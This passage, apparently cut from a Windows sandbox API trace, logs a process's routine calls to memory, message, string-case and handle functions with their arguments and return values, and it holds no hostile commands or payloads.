lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.673] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.673] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.673] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.673] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.673] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.673] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.673] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.673] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.673] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.673] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.673] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.674] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.674] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.675] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.676] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.677] FreeLibrary (hLibModule=0x74d40000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.677] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.677] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.678] CloseHandle (hObject=0x294) returned 1 [0254.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0254.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.680] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0254.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0254.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.682] CloseHandle (hObject=0x1f8) returned 1 [0254.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0254.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 